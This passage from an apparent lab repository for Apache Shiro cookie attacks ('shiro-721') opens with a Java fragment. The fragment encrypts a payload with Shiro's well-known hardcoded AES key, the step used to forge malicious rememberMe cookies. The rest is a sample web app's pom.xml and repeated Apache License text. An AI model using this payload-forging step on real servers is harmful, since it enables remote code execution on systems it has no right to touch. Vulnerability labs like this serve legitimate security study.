Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA==")); 19 | 20 | ByteSource ciphertext = aes.encrypt(payloads, key); 21 | System.out.printf(ciphertext.toString()); 22 | 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 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shiro-721/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 20 | 21 | 22 | 23 | 24 | 
org.apache.shiro.samples 25 | shiro-samples 26 | 1.4.1 27 | ../pom.xml 28 | 29 | 30 | 4.0.0 31 | samples-web 32 | Apache Shiro :: Samples :: Web 33 | war 34 | 35 | 36 | 9080 37 | 1 38 | 39 | 40 | 41 | 42 | 43 | org.eclipse.jetty 44 | jetty-maven-plugin 45 | ${jetty.version} 46 | 47 | / 48 | 49 | 9080 50 | 60000 51 | 52 | 53 | ./target/yyyy_mm_dd.request.log 54 | 90 55 | true 56 | false 57 | GMT 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | javax.servlet 67 | jstl 68 | runtime 69 | 70 | 71 | javax.servlet 72 | javax.servlet-api 73 | provided 74 | 75 | 76 | org.slf4j 77 | slf4j-log4j12 78 | runtime 79 | 80 | 81 | log4j 82 | log4j 83 | runtime 84 | 85 | 86 | net.sourceforge.htmlunit 87 | htmlunit 88 | test 89 | 90 | 91 | org.apache.shiro 92 | shiro-core 93 | 94 | 95 | org.apache.shiro 96 | shiro-web 97 | 98 | 99 | taglibs 100 | standard 101 | 102 | 103 | org.slf4j 104 | jcl-over-slf4j 105 | runtime 106 | 107 | 108 | org.eclipse.jetty 109 | apache-jsp 110 | ${jetty.version} 111 | test 112 | 113 | 114 | org.eclipse.jetty 115 | apache-jstl 116 | ${jetty.version} 117 | pom 118 | test 119 | 120 | 121 | org.apache.shiro.integrationtests 122 | shiro-its-support 123 | test 124 | 125 | 126 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /shiro-721/target/classes/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 
15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 
48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. 
Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. 
You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 
123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. 
In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. 
We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/test-classes/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. 
For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 
48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. 
Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. 
You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 
123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. 
In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. 
We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/maven-shared-archive-resources/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. 
For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 
48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. 
Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. 
You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 
123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. 
In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. 
We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. 
For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 
48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. 
Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. 
